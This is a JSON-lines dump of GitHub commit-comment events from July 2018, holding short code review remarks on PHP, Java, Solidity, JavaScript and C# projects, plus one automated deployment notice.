{"id":"7905462998","type":"CommitCommentEvent","actor":{"login":"oleg-andreyev"},"repo":{"name":"ecentria/JsonApiBundle"},"payload":{"comment":{"id":29563480,"position":12,"line":32,"path":"Serializer/Handler/DateHandler.php","commit_id":"987a63e6ee664b91dc0efdca005f45aa80bdb4a5","created_at":"2018-07-02T09:19:56Z","updated_at":"2018-07-02T09:19:56Z","author_association":"MEMBER","body":"Instead of adding this if-stmt, I think it's better to make sure that `getSubscribingMethods` returns two methods:\r\n\r\nExample:\r\n```\r\n    public static function getSubscribingMethods()\r\n    {\r\n        $methods = [];\r\n        $formats = ['json', 'xml', 'yml'];\r\n        foreach ($formats as $format) {\r\n            $methods[] = [\r\n                'direction' => GraphNavigator::DIRECTION_SERIALIZATION,\r\n                'type'      => self::TYPE_UUID,\r\n                'format'    => $format,\r\n                'method'    => 'serialize' . self::TYPE_UUID\r\n            ];\r\n\r\n            $methods[] = [\r\n                'direction' => GraphNavigator::DIRECTION_DESERIALIZATION,\r\n                'type'      => self::TYPE_UUID,\r\n                'format'    => $format,\r\n                'method'    => 'deserialize' . self::TYPE_UUID\r\n            ];\r\n        }\r\n\r\n        return $methods;\r\n    }\r\n```\r\n"}},"created_at":"2018-07-02T09:19:56Z"}
{"id":"7905464929","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563485,"position":4,"line":173,"path":"uiengine/src/main/java/com/axway/ats/uiengine/configuration/UiEngineConfigurator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:20:18Z","updated_at":"2018-07-02T09:20:18Z","author_association":"OWNER","body":"check this lines"}},"created_at":"2018-07-02T09:20:18Z"}
{"id":"7905465558","type":"CommitCommentEvent","actor":{"login":"wangyuan00"},"repo":{"name":"cucygh/interview"},"payload":{"comment":{"id":29563491,"position":null,"line":null,"path":null,"commit_id":"b77a8dce3cd86df82a790110904f2a4511202573","created_at":"2018-07-02T09:20:25Z","updated_at":"2018-07-02T09:20:25Z","author_association":"NONE","body":"点击 “View Raw”下载"}},"created_at":"2018-07-02T09:20:25Z"}
{"id":"7905465730","type":"CommitCommentEvent","actor":{"login":"talisela"},"repo":{"name":"cloudify-cosmo/docs.getcloudify.org"},"payload":{"comment":{"id":29563493,"position":19,"line":31,"path":"content/working_with/manager/using-secrets.md","commit_id":"f1e240f3e9ef8754ac9123db4b14e91487392337","created_at":"2018-07-02T09:20:27Z","updated_at":"2018-07-02T09:20:27Z","author_association":"COLLABORATOR","body":"I think it should be \"the secret with hidden value\" instead of \"hidden value\" at the end"}},"created_at":"2018-07-02T09:20:27Z"}
{"id":"7905468919","type":"CommitCommentEvent","actor":{"login":"disenQF"},"repo":{"name":"disenQF/hiMySQL"},"payload":{"comment":{"id":29563503,"position":11,"line":11,"path":"book.sql","commit_id":"4b2aa9f5945a644aa56c34deac5928808f05c6d9","created_at":"2018-07-02T09:21:05Z","updated_at":"2018-07-02T09:21:05Z","author_association":"OWNER","body":"可能会出现非法的sql语句"}},"created_at":"2018-07-02T09:21:05Z"}
{"id":"7905469583","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563504,"position":1,"line":5,"path":"uiengine/pom.xml","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:21:13Z","updated_at":"2018-07-02T09:21:13Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:21:13Z"}
{"id":"7905471018","type":"CommitCommentEvent","actor":{"login":"srhenning"},"repo":{"name":"catedrasaes-umu/emf4cpp"},"payload":{"comment":{"id":29563509,"position":null,"line":null,"path":null,"commit_id":"9386a4dd1561771dafe7020ec9f34c950d0e694d","created_at":"2018-07-02T09:21:30Z","updated_at":"2018-07-02T09:21:30Z","author_association":"NONE","body":"Unfortunately all setters/getters (eGet, eSet, eIsSet, and eUnset) are affected by the code change and are now broken. The previous implementation (with EAllStructuralFeatures) was correct and called all base class setters/getters in the switch construct. Therefore I suggest to revert this change. We will supply a corresponding reverting change as a pull request very soon.  "}},"created_at":"2018-07-02T09:21:30Z"}
{"id":"7905471214","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563511,"position":7,"line":34,"path":"testharness/src/main/java/com/axway/ats/harness/testng/RetryAnalyzer.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:21:32Z","updated_at":"2018-07-02T09:21:32Z","author_association":"OWNER","body":"keep this line"}},"created_at":"2018-07-02T09:21:32Z"}
{"id":"7905472422","type":"CommitCommentEvent","actor":{"login":"nikeshchatur"},"repo":{"name":"nikeshchatur/InsuranceAdvisor"},"payload":{"comment":{"id":29563512,"position":null,"line":null,"path":null,"commit_id":"ff583ee18d3e756f508f86928ef90ffe25bf1398","created_at":"2018-07-02T09:21:47Z","updated_at":"2018-07-02T09:21:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0844d966-682f-436f-b060-7172934baaca?env_id=ibm%3Ayp%3Aeu-gb \"Insurance advisor-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/9c8d73cd-01dd-47c8-aa40-0f008ab16a9a?env_id=ibm%3Ayp%3Aeu-gb \"InsuranceAdvisor-DeliveryPipeline\") deployed [InsuranceAdvisor](https://github.com/nikeshchatur/InsuranceAdvisor/releases/tag/deploy-ibm-yp-eu-gb-nikeshchaturvedi-yahoo.com-dev-20180702-092140 \"deploy-ibm-yp-eu-gb-nikeshchaturvedi-yahoo.com-dev-20180702-092140\") to [dev](https://console.bluemix.net/apps/240b0093-cd27-41e5-ac04-30ef08ee7ceb?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:nikeshchaturvedi@yahoo.com:dev\"), including this commit"}},"created_at":"2018-07-02T09:21:47Z"}
{"id":"7905474595","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563515,"position":1,"line":56,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngTestListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:22:12Z","updated_at":"2018-07-02T09:22:12Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:22:12Z"}
{"id":"7905476058","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563517,"position":1,"line":33,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngSuiteListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:22:28Z","updated_at":"2018-07-02T09:22:28Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:22:28Z"}
{"id":"7905477039","type":"CommitCommentEvent","actor":{"login":"talisela"},"repo":{"name":"cloudify-cosmo/docs.getcloudify.org"},"payload":{"comment":{"id":29563520,"position":null,"line":null,"path":null,"commit_id":"f1e240f3e9ef8754ac9123db4b14e91487392337","created_at":"2018-07-02T09:22:39Z","updated_at":"2018-07-02T09:22:39Z","author_association":"COLLABORATOR","body":"I like this phrasing better, as it's clearer to understand who can do what with hidden and non-hidded secrets. I would maybe add a sentence to emphasis the difference: with non-hidden secrets, regular users on the tenant can edit the secret's value, while with hidden value secrets they can't. "}},"created_at":"2018-07-02T09:22:39Z"}
{"id":"7905477348","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/krisztiankassai"},"payload":{"comment":{"id":29563523,"position":37,"line":32,"path":"week-06/day4/src/TodoApp.java","commit_id":"7578b4dffc390c7073325c4bcc5d7f4ac2fdf706","created_at":"2018-07-02T09:22:42Z","updated_at":"2018-07-02T09:22:42Z","author_association":"NONE","body":"I think the todo class has got everything to make this calculation and it much closer to the object than the main app. I would put this function into todo class as a method"}},"created_at":"2018-07-02T09:22:42Z"}
{"id":"7905480594","type":"CommitCommentEvent","actor":{"login":"nazar-pc"},"repo":{"name":"google/closure-compiler-npm"},"payload":{"comment":{"id":29563534,"position":null,"line":null,"path":null,"commit_id":"7baf37c7988be4ecea924e85b43400919598464a","created_at":"2018-07-02T09:23:19Z","updated_at":"2018-07-02T09:23:19Z","author_association":"NONE","body":"This is version `20180610.0.2` on NPM, but no corresponding tag in this repository"}},"created_at":"2018-07-02T09:23:19Z"}
{"id":"7905485936","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/krisztiankassai"},"payload":{"comment":{"id":29563540,"position":22,"line":22,"path":"week-06/day4/src/TodoApp.java","commit_id":"b405216668b6ff870972123faccb1ee106e8281a","created_at":"2018-07-02T09:24:19Z","updated_at":"2018-07-02T09:24:19Z","author_association":"NONE","body":"It is good that you created small separated function to arg checking, file read/write :+1: "}},"created_at":"2018-07-02T09:24:19Z"}
{"id":"7905514211","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/krisztiankassai"},"payload":{"comment":{"id":29563602,"position":72,"line":72,"path":"week-06/day4/src/TodoApp.java","commit_id":"b405216668b6ff870972123faccb1ee106e8281a","created_at":"2018-07-02T09:29:34Z","updated_at":"2018-07-02T09:29:34Z","author_association":"NONE","body":"Unfortunately it is a dangerous call, because no one guarantee that the args array has element at index 1 :(\r\nThe name of the function...this \"thing\" make it more specific? Or contain any more information about the algorithm? How about just simply `addTodo()`? "}},"created_at":"2018-07-02T09:29:34Z"}
{"id":"7905518091","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563609,"position":40,"line":34,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T09:30:19Z","updated_at":"2018-07-02T09:30:19Z","author_association":"NONE","body":"I see only `receiver1` being set only once, in the constructor. So you do not need to check that it is not `0` at every split. You need to check it at set time."}},"created_at":"2018-07-02T09:30:19Z"}
{"id":"7905522506","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563615,"position":39,"line":39,"path":"week -2(Orientation)/day3/Anagramm/Anagramm/Controllers/AnagrammController.cs","commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:31:06Z","updated_at":"2018-07-02T09:31:06Z","author_association":"NONE","body":"It is a pretty cool way to check the parameters, then provide it through another controller. \r\nUnderstandable, clean, straightforward."}},"created_at":"2018-07-02T09:31:06Z"}
{"id":"7905524772","type":"CommitCommentEvent","actor":{"login":"jadhavsoma"},"repo":{"name":"jadhavsoma/firebase"},"payload":{"comment":{"id":29563617,"position":null,"line":null,"path":null,"commit_id":"2e21af909cd2736d96c06d4792bcf5f864a059e8","created_at":"2018-07-02T09:31:32Z","updated_at":"2018-07-02T09:31:32Z","author_association":"OWNER","body":"In recent versions of cordova-android, location of res/Strings.xml file has changed, which mostly causes this error."}},"created_at":"2018-07-02T09:31:32Z"}
{"id":"7905524829","type":"CommitCommentEvent","actor":{"login":"maxime-esa"},"repo":{"name":"ttsiodras/asn1scc"},"payload":{"comment":{"id":29563618,"position":6,"line":165,"path":"StgAda/spec_a.stg","commit_id":"693349692644e510d1d6a9f503f47535ae697f0f","created_at":"2018-07-02T09:31:33Z","updated_at":"2018-07-02T09:31:33Z","author_association":"COLLABORATOR","body":"I think you can replace with:\r\n```\r\ntype <sName> is null record;\r\n``` "}},"created_at":"2018-07-02T09:31:33Z"}
{"id":"7905525132","type":"CommitCommentEvent","actor":{"login":"chubinou"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29563621,"position":17,"line":27,"path":"modules/gui/qt/qml/controlbar/Toolbar/BottomToolbar.qml","commit_id":"8ebb9d3f444fbb354e52815ff58636a17dfe2042","created_at":"2018-07-02T09:31:36Z","updated_at":"2018-07-02T09:31:36Z","author_association":"CONTRIBUTOR","body":"You should probably use an enum here"}},"created_at":"2018-07-02T09:31:36Z"}
{"id":"7905527317","type":"CommitCommentEvent","actor":{"login":"cinkova"},"repo":{"name":"cinkova/stopwoRds"},"payload":{"comment":{"id":29563625,"position":null,"line":null,"path":null,"commit_id":"e6de45653067f578cb4695cf7d0267e099784c8f","created_at":"2018-07-02T09:32:02Z","updated_at":"2018-07-02T09:32:02Z","author_association":"OWNER","body":"I have also added the data name into the namespace. No idea if it's the right way to do it. "}},"created_at":"2018-07-02T09:32:02Z"}
{"id":"7905527855","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563627,"position":1,"line":26,"path":"monitoringlibrary/src/main/java/com/axway/ats/monitoring/SystemMonitor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:32:07Z","updated_at":"2018-07-02T09:32:07Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:32:07Z"}
{"id":"7905528311","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"piatachki/otus-spring"},"payload":{"comment":{"id":29563629,"position":20,"line":20,"path":"src/main/java/com/example/otus/config/ApplicationConfiguration.java","commit_id":"714778a472093511e078f293e6dec52eab3d7496","created_at":"2018-07-02T09:32:12Z","updated_at":"2018-07-02T09:32:12Z","author_association":"NONE","body":"если такое же название методо, то можно и не ставить его ID в аннотации. В любом случае автоваринг происходит по типу, и можно насчёт ID особо не париться."}},"created_at":"2018-07-02T09:32:12Z"}
{"id":"7905529580","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"giulianodibacco/music-encoding"},"payload":{"comment":{"id":29563632,"position":null,"line":null,"path":null,"commit_id":"19b477ec7ae86b2c56842fb649f5546dd4efa831","created_at":"2018-07-02T09:32:26Z","updated_at":"2018-07-02T09:32:26Z","author_association":"NONE","body":"If you give me access to your repository, I can sort this out.\r\n\r\nGo to the \"settings\" tab, and then \"Collaborators\" and add me (`ahankinson`). Make sure I have at least 'write' access."}},"created_at":"2018-07-02T09:32:26Z"}
{"id":"7905531536","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"piatachki/otus-spring"},"payload":{"comment":{"id":29563633,"position":26,"line":23,"path":"src/main/java/com/example/otus/repository/FileQuizSource.java","commit_id":"714778a472093511e078f293e6dec52eab3d7496","created_at":"2018-07-02T09:32:48Z","updated_at":"2018-07-02T09:32:48Z","author_association":"NONE","body":"А почему не через конструктор?"}},"created_at":"2018-07-02T09:32:48Z"}
{"id":"7905534779","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563640,"position":47,"line":35,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T09:33:25Z","updated_at":"2018-07-02T09:33:25Z","author_association":"NONE","body":"After you are used to `msg.value`, you can skip assigning it to a brand new variable that does not change. Just use `msg.value`, it will cost less gas, and anyway you know what it is.\r\nThe `fundsSent` variable does not change from beginning to end of the function only because the developer is careful.\r\nThe `msg.value` variable does not change from beginning to end of the function enforced by the protocol."}},"created_at":"2018-07-02T09:33:25Z"}
{"id":"7905538305","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563646,"position":49,"line":37,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T09:34:04Z","updated_at":"2018-07-02T09:34:04Z","author_association":"NONE","body":"You can move this declaration down where it is set to its proper value."}},"created_at":"2018-07-02T09:34:04Z"}
{"id":"7905540305","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29563654,"position":null,"line":null,"path":null,"commit_id":"b3d690b56bbe160adf22264091cfa14e258d0d7b","created_at":"2018-07-02T09:34:25Z","updated_at":"2018-07-02T09:34:25Z","author_association":"COLLABORATOR","body":"Puzzle `552-9d3ef349` disappeared from [`src/main/java/com/zerocracy/pmo/People.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/People.java), that's why I closed #841. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-02T09:34:25Z"}
{"id":"7905541595","type":"CommitCommentEvent","actor":{"login":"TitanSnow"},"repo":{"name":"luogu-dev/markdown-palettes"},"payload":{"comment":{"id":29563656,"position":null,"line":null,"path":null,"commit_id":"ed8edc8589562be291ca888a32d2e6f0145a4ef1","created_at":"2018-07-02T09:34:41Z","updated_at":"2018-07-02T09:34:41Z","author_association":"CONTRIBUTOR","body":"Oh, I think there's no difference. :smiley: "}},"created_at":"2018-07-02T09:34:41Z"}
{"id":"7905542508","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563659,"position":1,"line":29,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngClassListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:34:51Z","updated_at":"2018-07-02T09:34:51Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:34:51Z"}
{"id":"7905543049","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"IlijaT/TodoAPP---Frontend"},"payload":{"comment":{"id":29563661,"position":22,"line":23,"path":"src/components/addTask.vue","commit_id":"0476c6207399993816d33858529b2f38dccacdd1","created_at":"2018-07-02T09:34:58Z","updated_at":"2018-07-02T09:34:58Z","author_association":"COLLABORATOR","body":"Ovi navodnici su visak\r\n```\r\ntodo: {\r\n  title: '',\r\n  description: '',\r\n  priority: ''\r\n}\r\n```"}},"created_at":"2018-07-02T09:34:58Z"}
{"id":"7905545036","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563666,"position":1,"line":31,"path":"testharness/src/main/java/com/axway/ats/harness/junit/AtsJunitTestListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:35:21Z","updated_at":"2018-07-02T09:35:21Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:35:21Z"}
{"id":"7905545447","type":"CommitCommentEvent","actor":{"login":"SensehacK"},"repo":{"name":"SensehacK/SensehacK.github.io"},"payload":{"comment":{"id":29563669,"position":null,"line":null,"path":null,"commit_id":"68ded9c94d43d133cbac93871c7957b6399b6572","created_at":"2018-07-02T09:35:25Z","updated_at":"2018-07-02T09:35:25Z","author_association":"OWNER","body":"Fixed #48 Placeholder for \"Last Fm\"."}},"created_at":"2018-07-02T09:35:25Z"}
{"id":"7905549587","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563674,"position":59,"line":46,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T09:36:12Z","updated_at":"2018-07-02T09:36:12Z","author_association":"NONE","body":"We are of the school that believes events should allow you to reconstitute the whole contract state only with them. \r\nSo here, I think it is worth mentioning all those things that changed the state: `owner` and `remainingShare`."}},"created_at":"2018-07-02T09:36:12Z"}
{"id":"7905550822","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563677,"position":1,"line":25,"path":"log/src/main/java/com/axway/ats/log/autodb/PGDbWriteAccess.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:36:26Z","updated_at":"2018-07-02T09:36:26Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:36:26Z"}
{"id":"7905551731","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29563679,"position":11,"line":11,"path":"Week-07/day-01/frontend/tests/test-greeter.js","commit_id":"7759269c4f9987beb50e227c6b9262d46d99c22b","created_at":"2018-07-02T09:36:37Z","updated_at":"2018-07-02T09:36:37Z","author_association":"NONE","body":"there should be one space after the last equal sign"}},"created_at":"2018-07-02T09:36:37Z"}
{"id":"7905552324","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29563680,"position":22,"line":22,"path":"Week-07/day-01/frontend/tests/test-greeter.js","commit_id":"7759269c4f9987beb50e227c6b9262d46d99c22b","created_at":"2018-07-02T09:36:44Z","updated_at":"2018-07-02T09:36:44Z","author_association":"NONE","body":"here too"}},"created_at":"2018-07-02T09:36:44Z"}
{"id":"7905552891","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29563682,"position":33,"line":33,"path":"Week-07/day-01/frontend/tests/test-greeter.js","commit_id":"7759269c4f9987beb50e227c6b9262d46d99c22b","created_at":"2018-07-02T09:36:50Z","updated_at":"2018-07-02T09:36:50Z","author_association":"NONE","body":"here too"}},"created_at":"2018-07-02T09:36:50Z"}
{"id":"7905553484","type":"CommitCommentEvent","actor":{"login":"fomalsd"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29563683,"position":6,"line":52,"path":"UnityProject/Assets/Scripts/PlayGroups/PlayerManager.cs","commit_id":"6f780ffc4ad3a740fc98a59260f5e36f96a075ff","created_at":"2018-07-02T09:36:57Z","updated_at":"2018-07-02T09:36:57Z","author_association":"CONTRIBUTOR","body":"damn, it won't work without this"}},"created_at":"2018-07-02T09:36:57Z"}
{"id":"7905556975","type":"CommitCommentEvent","actor":{"login":"fomalsd"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29563690,"position":6,"line":42,"path":"UnityProject/Assets/Scripts/Managers/PlayerList.cs","commit_id":"6f780ffc4ad3a740fc98a59260f5e36f96a075ff","created_at":"2018-07-02T09:37:39Z","updated_at":"2018-07-02T09:37:39Z","author_association":"CONTRIBUTOR","body":"This, on the other hand, can be removed"}},"created_at":"2018-07-02T09:37:39Z"}
{"id":"7905557098","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"piatachki/otus-spring"},"payload":{"comment":{"id":29563692,"position":20,"line":21,"path":"src/main/java/com/example/otus/service/Tester.java","commit_id":"714778a472093511e078f293e6dec52eab3d7496","created_at":"2018-07-02T09:37:41Z","updated_at":"2018-07-02T09:37:41Z","author_association":"NONE","body":"А вот здесь @Qualifier на саомм деле не нужен - у нас по одному бину"}},"created_at":"2018-07-02T09:37:41Z"}
{"id":"7905557662","type":"CommitCommentEvent","actor":{"login":"kulby"},"repo":{"name":"kulby/reaction"},"payload":{"comment":{"id":29563694,"position":null,"line":null,"path":null,"commit_id":"f5466ac6706082e5bf8630e4a6163190ef78d16d","created_at":"2018-07-02T09:37:46Z","updated_at":"2018-07-02T09:37:46Z","author_association":"OWNER","body":"This is the final version of Reaction App v1.0 (for FASIE interim reporting document)"}},"created_at":"2018-07-02T09:37:46Z"}
{"id":"7905558014","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29563695,"position":20,"line":null,"path":"app/src/at-thanhhoang/java/asiantech/internship/summer/exercise_recycler_view/model/TimelineItem.java","commit_id":"4e57f9c8cf6d6ec14dd1162eba7257fb5732bd2a","created_at":"2018-07-02T09:37:49Z","updated_at":"2018-07-02T09:37:49Z","author_association":"NONE","body":"WARNING: [BooleanGetMethodName] A getX() method which returns a boolean should be named isX()\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#BooleanGetMethodName"}},"created_at":"2018-07-02T09:37:49Z"}
{"id":"7905558333","type":"CommitCommentEvent","actor":{"login":"AllenZho"},"repo":{"name":"F-loat/mpvue-entry"},"payload":{"comment":{"id":29563696,"position":null,"line":null,"path":null,"commit_id":"a0bd7cc43d7715aa833a9e041bd44c8da7636d51","created_at":"2018-07-02T09:37:53Z","updated_at":"2018-07-02T09:37:53Z","author_association":"NONE","body":"Compile error when using the string '//' in the mpvue directory file /src/main.js. The error message is Syntax Error: Unterminated string constant"}},"created_at":"2018-07-02T09:37:53Z"}
{"id":"7905558487","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563698,"position":45,"line":97,"path":"log/src/main/java/com/axway/ats/log/autodb/DbAccessFactory.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:37:55Z","updated_at":"2018-07-02T09:37:55Z","author_association":"OWNER","body":"keep this line"}},"created_at":"2018-07-02T09:37:55Z"}
{"id":"7905558510","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29563699,"position":43,"line":31,"path":"Week-07/day-01/frontend/server.js","commit_id":"6242f936730bcc7657a41a33ed27f3a3810335c5","created_at":"2018-07-02T09:37:55Z","updated_at":"2018-07-02T09:37:55Z","author_association":"NONE","body":"it shouldn't be in a new row"}},"created_at":"2018-07-02T09:37:55Z"}
{"id":"7905559630","type":"CommitCommentEvent","actor":{"login":"fomalsd"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29563701,"position":6,"line":52,"path":"UnityProject/Assets/Scripts/PlayGroups/PlayerManager.cs","commit_id":"6f780ffc4ad3a740fc98a59260f5e36f96a075ff","created_at":"2018-07-02T09:38:09Z","updated_at":"2018-07-02T09:38:09Z","author_association":"CONTRIBUTOR","body":"Maybe do `PlayerList.Instance?.ResetSyncedState();`"}},"created_at":"2018-07-02T09:38:09Z"}
{"id":"7905560108","type":"CommitCommentEvent","actor":{"login":"aboletti"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29563703,"position":103,"line":504,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"e92316b240a2e7cbc2689b502318839ecced5f87","created_at":"2018-07-02T09:38:13Z","updated_at":"2018-07-02T09:38:13Z","author_association":"MEMBER","body":"@anigamova \r\nsince this condition is present many times in the code and it is identical everywhere, I propose to define a boolean variable before entering the \"switch\", and just use that"}},"created_at":"2018-07-02T09:38:13Z"}
{"id":"7905560260","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563704,"position":1,"line":47,"path":"log/src/main/java/com/axway/ats/log/autodb/DbAccessFactory.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:38:15Z","updated_at":"2018-07-02T09:38:15Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:38:15Z"}
{"id":"7905564657","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563709,"position":1,"line":107,"path":"corelibrary/src/test/java/com/axway/ats/core/validation/types/Test_TypeRegex.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:39:06Z","updated_at":"2018-07-02T09:39:06Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:39:06Z"}
{"id":"7905564813","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"IlijaT/TodoAPP---Frontend"},"payload":{"comment":{"id":29563711,"position":31,"line":9,"path":"src/services/taskService.js","commit_id":"0476c6207399993816d33858529b2f38dccacdd1","created_at":"2018-07-02T09:39:08Z","updated_at":"2018-07-02T09:39:08Z","author_association":"COLLABORATOR","body":"`autorizacion` ima typo\r\n\r\ni takodje nema potrebe da se ovako salju request-ovi, na duzi nacin\r\n\r\n```\r\nreturn axios.post('tasks', { todo })\r\n```\r\nA sam header treba da nakacis odmah iz localStorage-a, tipa u konstruktoru, i nakon login-a.\r\n`axios.defaults.headers.common['Authorization'] = Bearer ${token};`"}},"created_at":"2018-07-02T09:39:08Z"}
{"id":"7905565194","type":"CommitCommentEvent","actor":{"login":"lilixiong2018"},"repo":{"name":"lilixiong2018/DoubleCommander"},"payload":{"comment":{"id":29563712,"position":null,"line":null,"path":null,"commit_id":"9b1b775a31a62291accb96810690c0a220acde6e","created_at":"2018-07-02T09:39:12Z","updated_at":"2018-07-02T09:39:12Z","author_association":"OWNER","body":"Now we can type **bu** to select the file **build.bat** , and **#np** to open this file by Notepad++\r\n![image](https://user-images.githubusercontent.com/40269098/42156820-ae23dca2-7e1e-11e8-9c9e-df3c4639651a.png)\r\n"}},"created_at":"2018-07-02T09:39:12Z"}
{"id":"7905566328","type":"CommitCommentEvent","actor":{"login":"avish0694"},"repo":{"name":"avish0694/EventStore"},"payload":{"comment":{"id":29563713,"position":1,"line":1,"path":"tmp/src/EventStore.Core/Services/Transport/Http/Controllers/InfoController.cs","commit_id":"1d8656be6eb7dc22ca253c556b96981629bb46b3","created_at":"2018-07-02T09:39:25Z","updated_at":"2018-07-02T09:39:25Z","author_association":"OWNER","body":"@Lougarou Check this"}},"created_at":"2018-07-02T09:39:25Z"}
